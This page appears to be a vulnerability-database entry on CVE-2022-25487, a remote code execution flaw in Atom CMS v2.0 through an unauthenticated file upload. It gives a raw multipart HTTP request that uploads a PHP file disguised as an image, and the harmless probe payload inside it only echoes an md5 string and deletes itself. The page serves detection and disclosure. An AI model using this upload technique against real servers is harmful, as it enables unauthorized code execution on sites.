🔙 목록으로 돌아가기

CVE-2022-25487: Atom CMS v2.0 - Remote Code Execution

TitleAtom CMS v2.0 - Remote Code Execution
Authortheamanrawat
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationFixed in version Atom CMS v2.1
CVSS Score9.8
EPSS Score0.89284
CVE IDCVE-2022-25487
CWE IDCWE-434
Tags cve2022 cve rce atom cms unauth packetstorm intrusive thedigitalcraft fielupload vkev vuln

🔍 Vulnerability Description

Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.

🌐 HTTP Request

POST /admin/uploads.php?id=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: close
Content-Length: 404
Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041
Accept-Encoding: gzip

-----------------------------30623082103363803402542706041

Content-Disposition: form-data; name="file"





-----------------------------30623082103363803402542706041

Content-Disposition: form-data; name="file"; filename="38F7uoEsB00XeytHbRGruifhRG8.php"

Content-Type: image/jpeg





<?php echo md5("CVE-2022-25487");unlink(__FILE__);?>

-----------------------------30623082103363803402542706041--
GET /uploads/HY7Aga HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25487.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-25487.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A